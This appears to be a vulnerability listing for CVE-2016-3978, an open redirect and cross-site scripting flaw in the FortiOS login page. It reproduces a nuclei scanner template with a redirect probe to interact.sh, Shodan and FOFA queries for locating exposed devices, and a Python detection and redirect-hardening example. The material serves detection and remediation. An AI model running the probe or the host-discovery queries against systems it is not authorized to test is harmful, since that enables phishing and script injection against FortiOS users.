CVE-2016-3978: Fortinet FortiOS - Open Redirect/Cross-Site Scripting

Date: 2025-08-01 | Affected software: Fortinet FortiOS | PoC: public

Vulnerability description

FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."

PoC code [public]

id: CVE-2016-3978

info:
  name: Fortinet FortiOS  - Open Redirect/Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login."
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft.
  remediation: |
    Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability.
  reference:
    - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2016-3978
    - http://seclists.org/fulldisclosure/2016/Mar/68
    - http://www.securitytracker.com/id/1035332
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-3978
    cwe-id: CWE-79
    epss-score: 0.05549
    epss-percentile: 0.89913
    cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortios
    shodan-query:
      - http.html:"/remote/login" "xxxxxxxx"
      - http.favicon.hash:945408572
      - cpe:"cpe:2.3:o:fortinet:fortios"
      - port:10443 http.favicon.hash:945408572
    fofa-query:
      - body="/remote/login" "xxxxxxxx"
      - icon_hash=945408572
  tags: cve2016,cve,redirect,fortinet,fortios,seclists

http:
  - method: GET
    path:
      - '{{BaseURL}}/login?redir=http://www.interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a0047304502206141bc6a1398d56de957e2723347e28ca165300a29601bbcc6c917cee1938f9d022100a19b7dc35bfed71a0e21396b37eb8f66affb582ca3f486a9126a0550d96c155d:922c64590222798bb761d5b6d8e72950
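The template above only reports a finding when the Location header points at the callback host through one of the shapes its regex lists: an absolute http(s) URL, a scheme-relative "//" prefix, or the backslash forms "/\" and "/\\" that browsers normalise to "//". The following Python is an added example, not code from the template author or from Fortinet: it reuses the template's matcher verbatim to classify captured response headers, and beside it shows how a login handler should validate a post-login redirect value so that every one of those shapes falls back to a same-origin default. The sample headers and redirect values are constructed here; the callback host interact.sh is the one the template uses.

```python
import re
from urllib.parse import urlsplit

# Matcher regex copied verbatim from the nuclei template: flags a Location
# header whose target resolves to interact.sh via an absolute URL, a
# scheme-relative "//" prefix, or the backslash variants "/\" and "/\\".
LOCATION_MATCHER = re.compile(
    r'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)'
    r'(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
)


def location_points_to_callback(raw_headers: str) -> bool:
    """Detection side: True if a raw response header block redirects to the
    callback host in any of the shapes the template's regex enumerates."""
    return LOCATION_MATCHER.search(raw_headers) is not None


def safe_login_redirect(redir: str, default: str = "/") -> str:
    """Hardened handling of a login 'redir' parameter (assumed name, as in the
    template's request path). Returns the value only if it is a same-origin
    absolute path; anything with a scheme or host, a scheme-relative '//'
    prefix, or a backslash variant of it falls back to the default."""
    if not redir:
        return default
    # Browsers treat backslashes as forward slashes in URLs, so normalise
    # them first; otherwise '/\evil' would slip past a plain '//' check.
    normalised = redir.replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:
        return default  # http://..., //host, javascript:..., etc.
    if not normalised.startswith("/") or normalised.startswith("//"):
        return default  # not an absolute path, or '///host' style
    if any(ord(c) < 0x20 or c.isspace() for c in normalised):
        return default  # control characters / whitespace in a header value
    return normalised


if __name__ == "__main__":
    # Constructed samples: a vulnerable-style response and a clean one.
    print(location_points_to_callback("HTTP/1.1 302 Found\nLocation: http://www.interact.sh\n"))
    print(location_points_to_callback("HTTP/1.1 302 Found\nLocation: /dashboard\n"))
    for value in ["/dashboard?tab=1", "http://www.interact.sh", "//www.interact.sh",
                  "/\\www.interact.sh", "/\\\\www.interact.sh", "javascript:alert(1)"]:
        print(repr(value), "->", safe_login_redirect(value))
```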
